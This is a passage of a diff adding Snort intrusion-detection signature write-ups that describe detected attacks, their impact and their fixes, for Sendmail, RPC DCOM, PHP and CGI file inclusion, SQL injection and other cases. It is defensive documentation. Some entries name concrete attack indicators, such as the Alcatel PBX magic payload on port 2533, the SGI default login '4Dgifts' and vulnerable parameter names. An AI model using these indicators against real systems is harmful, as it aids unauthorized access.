+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpMyDirectory
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2263.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2263
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
--- /dev/null
+++ b/doc/signatures/896.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+896
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1198.txt
@@ -0,0 +1,77 @@
+Rule:  
+
+--
+Sid:
+1198
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web
+server. Also, the html-rend command can be used to launch denial of
+service attacks. 
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-usr-prop".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default).  Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
--- /dev/null
+++ b/doc/signatures/3177.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3177
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2570.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2570
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+In particular this rule generates events when a non-standard HTTP
+request is made to a server. Some applications do not handle this
+exception in an acceptable manner and may present an attacker with the
+opportunity to exploit the application and server becasue of this.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+	Seattle Lab Software SLMail Pro 2.0 to 2.0.9 inclusive
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+The use of some proxy servers like Inktomi, may cause this rule to
+generate events.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000152.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000152
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a
+buffer overflow associated with MDaemon IMAP authentication
+processing.
+
+--
+Impact:
+A successful attack can permit a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Detailed Information:
+The MDaemon IMAP server allows basic authentication to be
+exchanged between the client and server.  A vulnerability
+exists allowing an unauthenticated user to cause a buffer
+overflow by crafting an overly long authentication reply
+to a server challenge.  This can allow execution of arbitrary
+code on a vulnerable server.
+
+--
+Affected Systems:
+Alt-N MDaemon prior to 8.0.4
+
+--
+Attack Scenarios:
+An attacker can request IMAP authentication and reply to
+a server challenge with an overly long response, causing
+a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/1452.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1452
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3108.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3108
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3171.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3171
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1819.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1819
+
+--
+Summary:
+This event is generated when an attempted connection is observed originating from outside the network to the management port to the Alcatel PBX Phone Switch.
+
+--
+Impact:
+Remote access, denial of service, privilege escalation.  A successful attack may allow remote root access, shutdown of the device, or privlege escalation.
+
+--
+Detailed Information:
+The Alcatel 4000 PBX Phone Switch allows remote management via port 2533. It has been reported that sending a payload of hexidecimal 000143 in the first packet after the three-way handshake to the management port allows access to the device.  There are known default usernames and passwords that, if not changed, will allow control of the device.  Additionally, if a remote user logs in with an account that belongs to the group "other", a shutdown may be performed.  And, improper assignment of permissions on sensitive directories may permit a user to overwrite files and possibly escalate privileges.
+
+--
+Affected Systems:
+Alcatel 4400 PBX running real-time Chorus OS.
+
+--
+Attack Scenarios:
+An attacker may attempt to use this exploit to gain root access, shutdown the system, or escalate privilege from user to root.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block external access to the management port of the switch. 
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11019
+
+--
--- /dev/null
+++ b/doc/signatures/100000585.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000585
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_alter.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_alter.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/482.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+482
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Whatsup Gold software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Whatsup Gold software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS168
+
+--
--- /dev/null
+++ b/doc/signatures/709.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+709
+
+--
+Summary:
+This event is generated after an attempted login to a telnet server 
+using the username 4Dgifts.
+
+--
+Impact:
+Unauthorized remote access.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to login to a server
+using the username 4Dgifts via Telnet. This is a default account on some
+SGI based machines. The password may also be 4Dgifts or it may not have
+a password assigned.
+
+Repeated events from this rule may indicate a determined effort to guess
+the password for this account.
+
+--
+Affected Systems:
+	SGI Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server using the username
+4Dgifts.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the 4Dgifts account.
+
+Use ssh as an alternative to Telnet
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1350.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1350
+
+--
+Summary:
+Attempted python access via web
+
+--
+Impact:
+Attempt to execute a python script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a python script on a host. Python is a scripting language that is available on a wide variety of platforms. By default Python code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to Python in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Python may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all python scripts on the host should be written using the restriceted access mode. This forces Python to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1349
+
+--
--- /dev/null
+++ b/doc/signatures/3101.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3101
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000768.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000768
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "blog" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "blog" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/897.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+897
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1943.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1943
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1179.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1179
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/998.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 998
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000487.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000487
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "server.inc.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"server.inc.php" script used by the "ISPConfig" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
